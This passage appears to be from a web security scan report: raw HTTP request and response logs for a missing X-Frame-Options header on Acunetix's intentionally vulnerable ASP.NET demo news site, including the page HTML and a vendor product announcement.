9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmNkZGTLo6VVRRdQACEbfKXC37R1sHPpoA%3D%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwK30rH2AgL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBE1qoi%2FTB7mR4IysbuEg0lOgmHIs
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 18011
Response Body - size: 18,011 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9M2RkAgsPFgIeA3NyY2RkZNGFyTb9L/R3K+NgG4eTH6G64d5v" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKblqunCgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBEMuJR47/37fBoWsDm+8pRHDKDZX" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0
Method	POST
Parameter	X-Frame-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 463 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 Content-Length: 6529 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 6,529 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA%2BPHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc%2BICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8%2BbmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A%2BICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A%2BICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA%2BLSBTdXBwb3J0IGZvciBJUHY2PGJyIC8%2BICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8%2BICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8%2BICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA%2BVGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E%2BLjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0